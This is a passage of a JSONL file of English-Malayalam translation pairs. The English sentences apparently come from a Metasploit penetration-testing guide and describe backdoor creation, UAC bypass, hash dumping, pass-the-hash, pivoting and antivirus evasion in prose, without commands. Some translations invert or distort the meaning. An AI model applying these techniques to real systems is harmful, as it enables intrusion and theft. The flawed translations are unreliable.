ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Then, we will stop the sniffer using the sniffer_stop 3 command.","translation":"തുടർന്ന്, sniffer_stop 3 കമാൻഡ് ഉപയോഗിച്ച് ഞങ്ങൾ സ്നിഫർ നിർത്തും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Download the PCAP using the sniffer_dump 3 command.","translation":"sniffer_dump 3 കമാൻഡ് ഉപയോഗിച്ച് PCAP ഡൗൺലോഡ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Now that we have the PCAP file, we can use tcpdump, a packet analyzer command-line tool.","translation":"ഇപ്പോൾ നമ്മുടെ പക്കൽ PCAP ഫയൽ ഉള്ളതുകൊണ്ട്, പാക്കറ്റ് അനലൈസർ കമാൻഡ്-ലൈൻ ടൂളായ tcpdump ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Looking at the output, we can see that we were able to capture the FTP credentials.","translation":"ഔട്ട്‌പുട്ട് നോക്കുമ്പോൾ, FTP ക്രെഡൻഷ്യലുകൾ പിടിച്ചെടുക്കാൻ കഴിഞ്ഞു എന്ന് കാണാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This is the reason why you should use clear text protocols, such as FTP and Telnet.","translation":"FTP, ടെൽനെറ്റ് പോലുള്ള വ്യക്തമായ ടെക്സ്റ്റ് പ്രോട്ടോക്കോളുകൾ ഉപയോഗിക്കേണ്ടതിന്റെ കാരണമിതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"You might have realized the important role of Meterpreter to make our penetration task easier and faster.","translation":"നമ്മുടെ നുഴഞ്ഞുകയറ്റ ജോലി എളുപ്പമാക്കാനും വേഗത്തിലാക്കാനും മീറ്റർപ്രട്ടറിൻ്റെ പ്രാധാന്യം നിങ്ങൾ തിരിച്ചറിഞ്ഞിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"We will dive deeper into the core of Metasploit to understand how Meterpreter scripts function.","translation":"മീറ്റർപ്രട്ടർ സ്ക്രിപ്റ്റുകൾ എങ്ങനെ പ്രവർത്തിക്കുമെന്നും മനസ്സിലാക്കാൻ നമ്മൾ മെറ്റാസ്പ്ലോയിറ്റിൻ്റെ കാതലിലേക്ക് ഇറങ്ങും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"From a penetration tester's point of view, it is essential to know how to implement our own scripting techniques.","translation":"ഒരു നുഴഞ്ഞുകയറ്റക്കാരൻ്റെ കാഴ്ചപ്പാടിൽ, നമ്മുടെ സ്വന്തം സ്ക്രിപ്റ്റിംഗ് ടെക്നിക്കുകൾ എങ്ങനെ നടപ്പിലാക്കാമെന്ന് അറിയേണ്ടത് അത്യാവശ്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"There can be situations when you have to perform tasks where Meterpreter may not be enough.","translation":"മീറ്റർപ്രട്ടർ മതിയാകാത്ത ജോലികൾ ചെയ്യേണ്ടി വരുന്ന സാഹചര്യങ്ങൾ ഉണ്ടാകാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This is where developing our own scripts and modules come in handy.","translation":"ഇവിടെയാണ് നമ്മുടെ സ്വന്തം സ്ക്രിപ്റ്റുകളും മൊഡ്യൂളുകളും വികസിപ്പിക്കുന്നത് സഹായകമാകുന്നത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The Meterpreter API can be helpful for programmers to implement their own scripts.","translation":"പ്രോഗ്രാമർമാർക്ക് അവരുടെ സ്വന്തം സ്ക്രിപ്റ്റുകൾ നടപ്പിലാക്കാൻ മീറ്റർപ്രട്ടർ API സഹായകമാകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will be dealing with Ruby scripts in the next few recipes.","translation":"അടുത്ത കുറച്ച് പാചകക്കുറിപ്പുകളിൽ നമ്മൾ റൂബി സ്ക്രിപ്റ്റുകളുമായി ഇടപെടും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"If you have a basic understanding of Ruby and other scripting languages, then it will be easy for you to understand the concepts.","translation":"റൂബിയെക്കുറിച്ചും മറ്റ് സ്ക്രിപ്റ്റിംഗ് ഭാഷകളെക്കുറിച്ചും നിങ്ങൾക്ക് അടിസ്ഥാനപരമായ ധാരണയുണ്ടെങ്കിൽ, ആശയങ്ങൾ മനസ്സിലാക്കാൻ ഇത് എളുപ്പമാകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Let's start by launching an interactive Ruby shell with Meterpreter.","translation":"മീറ്റർപ്രട്ടർ ഉപയോഗിച്ച് ഒരു സംവേദനാത്മക റൂബി ഷെൽ ആരംഭിക്കുന്നതിലൂടെ തുടങ്ങാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Now that we are in the Ruby shell, we can execute our Ruby scripts.","translation":"നമ്മൾ ഇപ്പോൾ റൂബി ഷെല്ലിൽ എത്തിയിരിക്കുകയാണ്, നമുക്ക് നമ്മുടെ റൂബി സ്ക്രിപ്റ്റുകൾ എക്സിക്യൂട്ട് ചെയ്യാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Let's use the framework object and display information about our session.","translation":"നമ്മുടെ സെഷനെക്കുറിച്ചുള്ള വിവരങ്ങൾ പ്രദർശിപ്പിക്കുന്നതിന് ഫ്രെയിംവർക്ക് ഒബ്ജക്റ്റ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Use client to display information about our target machine.","translation":"നമ്മുടെ ടാർഗെറ്റ് മെഷീനെക്കുറിച്ചുള്ള വിവരങ്ങൾ പ്രദർശിപ്പിക്കാൻ ക്ലയിന്റ് ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"This call will print the output and add a carriage return at the end.","translation":"ഈ കോൾ ഔട്ട്‌പുട്ട് പ്രിൻ്റ് ചെയ്യുകയും അവസാനം ഒരു കാരിയേജ് റിട്ടേൺ ചേർക്കുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Railgun is an extension for Meterpreter that allows us to make calls to a Windows API.","translation":"വിൻഡോസ് API-കളിലേക്ക് കോളുകൾ ചെയ്യാൻ അനുവദിക്കുന്ന മീറ്റർപ്രട്ടറിനായുള്ള ഒരു എക്സ്റ്റൻഷനാണ് റെയിൽഗൺ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This command is used to migrate from one process context to another.","translation":"ഈ കമാൻഡ് ഒരു പ്രോസസ് കോൺടെക്സ്റ്റിൽ നിന്ന് മറ്റൊന്നിലേക്ക് മാറാൻ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can migrate to any other active process by using the process name or the ID.","translation":"പ്രോസസ് നാമമോ IDയോ ഉപയോഗിച്ച് നമുക്ക് മറ്റേതെങ്കിലും സജീവ പ്രക്രിയയിലേക്ക് മാറാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The ps command can be used to identify all active processes along with their names and IDs.","translation":"എല്ലാ സജീവ പ്രക്രിയകളും അവയുടെ പേരുകളും ഐഡികളും തിരിച്ചറിയാൻ ps കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Although still used, UAC is inherently broken and can be trivially defeated.","translation":"ഇപ്പോഴും ഉപയോഗത്തിലുണ്ടെങ്കിലും, UAC അന്തർലീനമായി തകർന്നതും നിസ്സാരമായി പരാജയപ്പെടുത്താൻ കഴിയുന്നതുമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We will target the Windows 7 machine.","translation":"ഞങ്ങൾ വിൻഡോസ് 7 മെഷീനെ ലക്ഷ്യമിടുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"To generate the backdoor, we will use a Windows Meterpreter reverse TCP payload.","translation":"ബാക്ക്ഡോർ ഉണ്ടാക്കാൻ, ഞങ്ങൾ ഒരു വിൻഡോസ് മീറ്റർപ്രറ്റർ റിവേഴ്സ് TCP പേലോഡ് ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"After setting the listening address with the LHOST option and looking at the available options for the generate command.","translation":"LHOST ഓപ്ഷൻ ഉപയോഗിച്ച് കേൾക്കുന്ന വിലാസം സജ്ജീകരിച്ച ശേഷം, ജനറേറ്റ് കമാൻഡിനായുള്ള ലഭ്യമായ ഓപ്ഷനുകൾ പരിശോധിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Now that we have created the backdoor, we need to set up a listener to receive the reverse shell.","translation":"ബാക്ക്ഡോർ ഉണ്ടാക്കിയ ശേഷം, റിവേഴ്സ് ഷെൽ സ്വീകരിക്കുന്നതിന് ഒരു ലിസണർ സ്ഥാപിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"By starting the listener with run -j, it will run it in the context of a job.","translation":"റൺ -ജെ ഉപയോഗിച്ച് ലിസണർ ആരംഭിക്കുന്നതിലൂടെ, ഇത് ഒരു ജോലിയുടെ ഭാഗമായി പ്രവർത്തിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To copy the backdoor to the target, we can use the FTP File Server auxiliary module.","translation":"ബാക്ക്ഡോർ ടാർഗെറ്റിലേക്ക് പകർത്താൻ, FTP ഫയൽ സെർവർ സഹായ മൊഡ്യൂൾ ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"If everything went well, we should have a new Meterpreter session on the target machine.","translation":"എല്ലാം നന്നായി നടന്നാൽ, ടാർഗെറ്റ് മെഷീനിൽ ഒരു പുതിയ മീറ്റർപ്രറ്റർ സെഷൻ ഉണ്ടായിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Now that we have a session on the target machine, one of the first things we want is to try to elevate our privileges.","translation":"ടാർഗെറ്റ് മെഷീനിൽ ഞങ്ങൾക്ക് ഒരു സെഷൻ ലഭിച്ചുകഴിഞ്ഞാൽ, ആദ്യമായി ചെയ്യേണ്ട ഒന്ന് നമ്മുടെ പ്രത്യേകാവകാശങ്ങൾ ഉയർത്താൻ ശ്രമിക്കുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"However, privilege escalation using the getsystem command fails because of UAC.","translation":"എങ്കിലും, getsystem കമാൻഡ് ഉപയോഗിച്ചുള്ള പ്രിവിലേജ് എസ്‌കലേഷൻ UAC കാരണം പരാജയപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Before we can use getsystem to perform a privilege escalation attack, we first need to bypass UAC.","translation":"പ്രിവിലേജ് എസ്‌കലേഷൻ അറ്റാക്ക് നടത്താൻ getsystem ഉപയോഗിക്കുന്നതിന് മുമ്പ്, നമ്മൾ ആദ്യം UAC മറികടക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"As you can see, bypassing UAC is easy, which is why you should not rely on UAC as a security mechanism.","translation":"നിങ്ങൾക്ക് കാണാനാകുന്നതുപോലെ, UAC മറികടക്കുന്നത് എളുപ്പമാണ്, അതുകൊണ്ടാണ് ഒരു സുരക്ഷാ സംവിധാനമായി UAC-യെ ആശ്രയിക്കാതിരിക്കേണ്ടത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Security Accounts Manager (SAM) is a database in the Windows operating system that contains usernames and passwords.","translation":"സെക്യൂരിറ്റി അക്കൗണ്ട്സ് മാനേജർ (SAM) എന്നത് വിൻഡോസ് ഓപ്പറേറ്റിംഗ് സിസ്റ്റത്തിലെ ഒരു ഡാറ്റാബേസാണ്, അതിൽ ഉപയോക്തൃനാമങ്ങളും പാസ്‌വേഡുകളും അടങ്ങിയിരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"First, we will start with the classic Meterpreter hashdump command.","translation":"ആദ്യം, ക്ലാസിക് മീറ്റർപ്രറ്റർ ഹാഷ്‌ഡംപ് കമാൻഡ് ഉപയോഗിച്ച് ആരംഭിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The post-exploitation module will dump the local accounts from the SAM database.","translation":"പോസ്റ്റ്-എക്സ്പ്ലോയിറ്റേഷൻ മൊഡ്യൂൾ SAM ഡാറ്റാബേസിൽ നിന്നുള്ള പ്രാദേശിക അക്കൗണ്ടുകൾ ഡംപ് ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The pass the hash technique allows us to authenticate to a remote server or service by passing the hashed credentials directly.","translation":"പാസ് ദ ഹാഷ് ടെക്നിക്ക്, എൻക്രിപ്റ്റ് ചെയ്ത ക്രെഡൻഷ്യലുകൾ നേരിട്ട് നൽകി വിദൂര സെർവറിലോ സേവനത്തിലോ പ്രാമാണീകരിക്കാൻ നമ്മെ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Incognito allows us to impersonate user tokens.","translation":"Incognito ഉപയോക്തൃ ടോക്കണുകൾ അനുകരിക്കാൻ നമ്മെ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The attacker can compromise a web server that is connected to the internet.","translation":"ഇന്റർനെറ്റിലേക്ക് കണക്ട് ചെയ്തിട്ടുള്ള ഒരു വെബ് സെർവറിനെ ആക്രമണകാരിക്ക് തകർക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Then, the attacker uses the compromised server to access the internal network.","translation":"അതിനുശേഷം, ആന്തരിക ശൃംഖലയിലേക്ക് പ്രവേശിക്കാൻ ആക്രമണകാരി തകർന്ന സെർവർ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"This is a typical scenario that involves pivoting.","translation":"ഇതൊരു സാധാരണ സാഹചര്യമാണ്, അതിൽ പിവറ്റിംഗ് ഉൾപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"In our lab, we use a dual home server to simulate an internet-facing server with access to the LAN network.","translation":"ഞങ്ങളുടെ ലാബിൽ, ലാൻ നെറ്റ്‌വർക്കിലേക്ക് പ്രവേശിക്കാൻ കഴിയുന്ന ഒരു ഇന്റർനെറ്റ്-ഫേസിംഗ് സെർവർ അനുകരിക്കുന്നതിന് ഞങ്ങൾ ഒരു ഇരട്ട ഹോം സെർവർ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"To set up the Windows 10 client machine for this recipe, we first need to configure the network adapter.","translation":"ഈ പാചകക്കുറിപ്പിനായി വിൻഡോസ് 10 ക്ലയിന്റ് മെഷീൻ സജ്ജീകരിക്കുന്നതിന്, ആദ്യം നെറ്റ്‌വർക്ക് അഡാപ്റ്റർ കോൺഫിഗർ ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Then, we will disable the Windows 10 firewall.","translation":"തുടർന്ന്, ഞങ്ങൾ വിൻഡോസ് 10 ഫയർവാൾ പ്രവർത്തനരഹിതമാക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Add a new DWORD (32-bit) key named LocalAccountTokenFilterPolicy.","translation":"LocalAccountTokenFilterPolicy എന്ന് പേരുള്ള ഒരു പുതിയ DWORD (32-ബിറ്റ്) കീ ചേർക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"First, we will target the Linux server using the Samba \"username map script\" Command Execution exploit.","translation":"ആദ്യം, സാംബ \"യൂസർനെയിം മാപ്പ് സ്ക്രിപ്റ്റ്\" കമാൻഡ് എക്സിക്യൂഷൻ എക്സ്പ്ലോയിറ്റ് ഉപയോഗിച്ച് ഞങ്ങൾ Linux സെർവറിനെ ലക്ഷ്യമിടുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Now that we have a session, we will use the sessions command with the -u option to upgrade the shell to a Meterpreter session.","translation":"നമുക്ക് ഇപ്പോൾ ഒരു സെഷൻ ഉള്ളതിനാൽ, ഷെല്ലിനെ ഒരു മീറ്റർപ്രറ്റർ സെഷനിലേക്ക് അപ്‌ഗ്രേഡ് ചെയ്യാൻ -u എന്ന ഓപ്ഷനോടുകൂടി സെഷൻസ് കമാൻഡ് ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"With our newly created Meterpreter session, we can use the ifconfig command on the target to see the available interfaces.","translation":"നമ്മുടെ പുതിയതായി സൃഷ്ടിച്ച മീറ്റർപ്രറ്റർ സെഷൻ ഉപയോഗിച്ച്, ലഭ്യമായ ഇന്റർഫേസുകൾ കാണുന്നതിന് ടാർഗെറ്റിൽ ifconfig കമാൻഡ് ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The target node has three interfaces.","translation":"ലക്ഷ്യസ്ഥാനത്തിന് മൂന്ന് ഇന്റർഫേസുകൾ ഉണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Our next aim will be to find which systems are available on this local network.","translation":"ഈ പ്രാദേശിക നെറ്റ്‌വർക്കിൽ ഏതൊക്കെ സിസ്റ്റങ്ങളാണ് ലഭ്യമാവുക എന്ന് കണ്ടെത്തുക എന്നതാണ് അടുത്ത ലക്ഷ്യം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To do this, we will use the Multi Gather Ping Sweep post-exploitation module.","translation":"ഇത് ചെയ്യുന്നതിന്, ഞങ്ങൾ Multi Gather Ping Sweep പോസ്റ്റ്-എക്സ്പ്ലോയിറ്റേഷൻ മൊഡ്യൂൾ ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To access the target in the 10.0.0.0/24 network, we will have to route all the packets through the compromised Linux machine.","translation":"10.0.0.0/24 നെറ്റ്‌വർക്കിലെ ടാർഗെറ്റിലേക്ക് പ്രവേശിക്കാൻ, വിട്ടുവീഴ്ച ചെയ്ത Linux മെഷീനിലൂടെ എല്ലാ പാക്കറ്റുകളും റൂട്ട് ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Now, you can do a quick port scan on the IP address 10.0.0.161 using the TCP Port Scanner auxiliary module.","translation":"ഇപ്പോൾ, TCP പോർട്ട് സ്കാനർ സഹായ മൊഡ്യൂൾ ഉപയോഗിച്ച് IP വിലാസം 10.0.0.161-ൽ നിങ്ങൾക്ക് ഒരു പോർട്ട് സ്കാൻ നടത്താം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we know the target is running SMB, we can use the SMB Version Detection auxiliary module.","translation":"ലക്ഷ്യസ്ഥാനത്ത് SMB പ്രവർത്തിക്കുന്നുണ്ടെന്ന് ഇപ്പോൾ അറിയാം, SMB പതിപ്പ് കണ്ടെത്തൽ സഹായ മൊഡ്യൂൾ ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"With the information gathered, we can use the Microsoft Windows Authenticated User Code Execution exploit module.","translation":"ശേഖരിച്ച വിവരങ്ങൾ ഉപയോഗിച്ച്, Microsoft Windows Authenticated User Code Execution എക്സ്പ്ലോയിറ്റ് മൊഡ്യൂൾ ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Discussing pivoting is never complete without talking about port forwarding.","translation":"പോർട്ട് ഫോർവേഡിംഗിനെക്കുറിച്ച് പറയാതെ പിവറ്റിംഗ് ചർച്ച ചെയ്യുന്നത് പൂർണ്ണമാകില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"For this recipe, we will turn on Internet Information Services on the target Windows 10 machine.","translation":"ഈ പാചകക്കുറിപ്പിനായി, ടാർഗെറ്റ് വിൻഡോസ് 10 മെഷീനിൽ ഇന്റർനെറ്റ് ഇൻഫർമേഷൻ സേവനങ്ങൾ ഓൺ ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Successful execution of the command shows that a local TCP relay has been set up.","translation":"കമാൻഡിന്റെ വിജയകരമായ നടപ്പാക്കൽ, ഒരു പ്രാദേശിക TCP റിലേ സ്ഥാപിച്ചിട്ടുണ്ടെന്ന് കാണിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"You definitely need a sound knowledge of Ruby scripting if you want to build good modules.","translation":"നല്ല മൊഡ്യൂളുകൾ ഉണ്ടാക്കാൻ നിങ്ങൾ തീർച്ചയായും റൂബി സ്ക്രിപ്റ്റിംഗിനെക്കുറിച്ച് നല്ല അറിവ് നേടണം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"You can also contribute to the Metasploit community by releasing your module and let others benefit from it.","translation":"നിങ്ങളുടെ മൊഡ്യൂൾ പുറത്തിറക്കുന്നതിലൂടെ മെറ്റാസ്‌പ്ലോയിറ്റ് കമ്മ്യൂണിറ്റിക്ക് സംഭാവന ചെയ്യാനും മറ്റുള്ളവരെ ഇതിൽ നിന്ന് പ്രയോജനപ്പെടുത്താനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"MSFvenom is the tool to use for payload generation and encoding and it is an evolution of msfpayload and msfencode.","translation":"പേലോഡ് ഉണ്ടാക്കുന്നതിനും എൻകോഡിംഗിനുമായി ഉപയോഗിക്കാനുള്ള ഉപകരണമാണ് MSFvenom, ഇത് msfpayload, msfencode എന്നിവയുടെ പരിണാമമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In this chapter, we dig a bit deeper on the available payloads, learn why encoders can be useful when trying to evade detection.","translation":"ഈ അധ്യായത്തിൽ, ലഭ്യമായ പേലോഡുകളെക്കുറിച്ച് കൂടുതൽ ആഴത്തിൽ പഠിക്കുകയും, കണ്ടെത്തൽ ഒഴിവാക്കാൻ ശ്രമിക്കുമ്പോൾ എൻകോഡറുകൾ എങ്ങനെ ഉപയോഗപ്രദമാകും എന്നും പഠിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can tell MSFvenom is one of the most versatile and useful payload-generation tools just by looking at the available payloads.","translation":"ലഭ്യമായ പേലോഡുകൾ മാത്രം നോക്കിയാൽ മതി MSFvenom ഏറ്റവും മികച്ചതും ഉപയോഗപ്രദവുമായ പേലോഡ് ഉണ്ടാക്കുന്ന ടൂളുകളിൽ ഒന്നാണെന്ന് മനസിലാക്കാൻ.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To generate a payload, we always need to use at least two options, -p and -f.","translation":"ഒരു പേലോഡ് ഉണ്ടാക്കാൻ, നമ്മൾ എപ്പോഴും കുറഞ്ഞത് രണ്ട് ഓപ്ഷനുകൾ ഉപയോഗിക്കണം, -p, -f.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"The -p option is used to specify which payload to generate from all those available in the Metasploit Framework.","translation":"മെറ്റാസ്‌പ്ലോയിറ്റ് ഫ്രെയിംവർക്കിൽ ലഭ്യമായവയിൽ നിന്ന് ഏത് പേലോഡ് ഉണ്ടാക്കണമെന്ന് വ്യക്തമാക്കാൻ -p എന്ന ഓപ്ഷൻ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The -f option is used to specify the output format.","translation":"-f എന്ന ഓപ്ഷൻ ഔട്ട്‌പുട്ട് ഫോർമാറ്റ് വ്യക്തമാക്കാൻ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} {"en":"Executable formats will generate programs and scripts, while transform formats will just produce the payload.","translation":"എക്സിക്യൂട്ടബിൾ ഫോർമാറ്റുകൾ പ്രോഗ്രാമുകളും സ്ക്രിപ്റ്റുകളും ഉണ്ടാക്കും, അതേസമയം ട്രാൻസ്ഫോം ഫോർമാറ്റുകൾ പേലോഡ് ഉണ്ടാക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"We can also specify a custom payload by using the -p option with -.","translation":"- ഉപയോഗിച്ച് -p ഓപ്ഷൻ ഉപയോഗിച്ച് നമുക്ക് ഇഷ്ടമുള്ള പേലോഡ് വ്യക്തമാക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"When generating payloads, we use the -a option for the architecture to use, --platform to specify the platform of the payload, and -o to save the payload.","translation":"പേലോഡുകൾ ഉണ്ടാക്കുമ്പോൾ, ആർക്കിടെക്ചറിനായി -a ഓപ്ഷനും, പേലോഡിൻ്റെ പ്ലാറ്റ്‌ഫോം വ്യക്തമാക്കാൻ --platform ഉം, പേലോഡ് സേവ് ചെയ്യാൻ -o ഉം ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"One useful feature when doing exploit development, is the --smallest option, which we can use to generate the smallest possible payload.","translation":"എക്സ്പ്ലോയിറ്റ് വികസിപ്പിക്കുമ്പോൾ ഉപയോഗപ്രദമായ ഒരു ഫീച്ചറാണ് --smallest ഓപ്ഷൻ, ഇത് ഏറ്റവും ചെറിയ പേലോഡ് ഉണ്ടാക്കാൻ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"To test this payload, we can set the execution permission using the chmod command, and then run the payload.","translation":"ഈ പേലോഡ് പരീക്ഷിക്കാൻ, chmod കമാൻഡ് ഉപയോഗിച്ച് എക്സിക്യൂഷൻ പെർമിഷൻ നൽകി, തുടർന്ന് പേലോഡ് പ്രവർത്തിപ്പിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"In another terminal, we can use netcat to connect to the bind shell on port 4444.","translation":"മറ്റൊരു ടെർമിനലിൽ, പോർട്ട് 4444-ൽ ബൈൻഡ് ഷെല്ലിലേക്ക് കണക്ട് ചെയ്യാൻ netcat ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Now that we have learned how to create a basic bind shell, we will try to create a reverse shell.","translation":"ഒരു അടിസ്ഥാന ബൈൻഡ് ഷെൽ എങ്ങനെ ഉണ്ടാക്കാമെന്ന് ഇപ്പോൾ മനസിലായി, നമുക്ക് ഒരു റിവേഴ്സ് ഷെൽ ഉണ്ടാക്കാൻ ശ്രമിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"First, we need to see the available options for the selected payload, which we can do using the --payload-options option.","translation":"ആദ്യം, തിരഞ്ഞെടുത്ത പേലോഡിനായുള്ള ലഭ്യമായ ഓപ്ഷനുകൾ കാണണം, --payload-options എന്ന ഓപ്ഷൻ ഉപയോഗിച്ച് ഇത് ചെയ്യാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"The options available are overwhelming, but, for the time being, we just need to set up the basic options, such as the listen address and port.","translation":"ലഭ്യമായ ഓപ്ഷനുകൾ വളരെ കൂടുതലാണ്, എന്നാൽ തൽക്കാലം, കേൾക്കുന്ന വിലാസവും പോർട്ടും പോലുള്ള അടിസ്ഥാന ഓപ്ഷനുകൾ സജ്ജീകരിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Creating payloads for a Windows target is as easy; all we need to do is specify the architecture to use, the target platform, the payload we need to run on the target, the listen followed by the output format and name.","translation":"വിൻഡോസ് ടാർഗെറ്റിനായി പേലോഡുകൾ ഉണ്ടാക്കുന്നത് വളരെ എളുപ്പമാണ്; ഉപയോഗിക്കേണ്ട ആർക്കിടെക്ചർ, ടാർഗെറ്റ് പ്ലാറ്റ്‌ഫോം, ടാർഗെറ്റിൽ പ്രവർത്തിപ്പിക്കേണ്ട പേലോഡ്, കേൾക്കാനുള്ള വിലാസം, തുടർന്ന് ഔട്ട്‌പുട്ട് ഫോർമാറ്റും പേരും എന്നിവ വ്യക്തമാക്കിയാൽ മതി.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Specifying an additional win32 shellcode, by using the -c or --add-code option, we can turn multiple payloads into one.","translation":"-c അല്ലെങ്കിൽ --add-code ഓപ്ഷൻ ഉപയോഗിച്ച് അധിക win32 ഷെൽകോഡ് വ്യക്തമാക്കുന്നതിലൂടെ, ഒന്നിലധികം പേലോഡുകളെ ഒന്നാക്കി മാറ്റാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"Generating payloads is just the first step; nowadays security products, such as Intrusion Detection Systems (IDSs), antivirus and anti-malware software, can easily pick up the shellcode generated by MSFvenom.","translation":"പേലോഡുകൾ ഉണ്ടാക്കുക എന്നത് ആദ്യത്തെ ഘട്ടം മാത്രമാണ്; ഇന്നത്തെ കാലത്ത്, ഇൻട്രൂഷൻ ഡിറ്റക്ഷൻ സിസ്റ്റംസ് (IDS), ആന്റിവൈറസ്, ആന്റി-മാൽവെയർ സോഫ്റ്റ്‌വെയർ പോലുള്ള സുരക്ഷാ ഉൽപ്പന്നങ്ങൾക്ക് MSFvenom ഉണ്ടാക്കിയ ഷെൽകോഡ് എളുപ്പത്തിൽ കണ്ടെത്താൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} {"en":"However, when we get access to a client machine the reality is different.","translation":"എങ്കിലും, ഒരു ക്ലയിന്റ് മെഷീനിലേക്ക് പ്രവേശിക്കുമ്പോൾ, യാഥാർത്ഥ്യം വ്യത്യസ്തമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} {"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 262 ] Exploiting a Windows 10 machine In this recipe, we will exploit a use-after-free vulnerability present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft 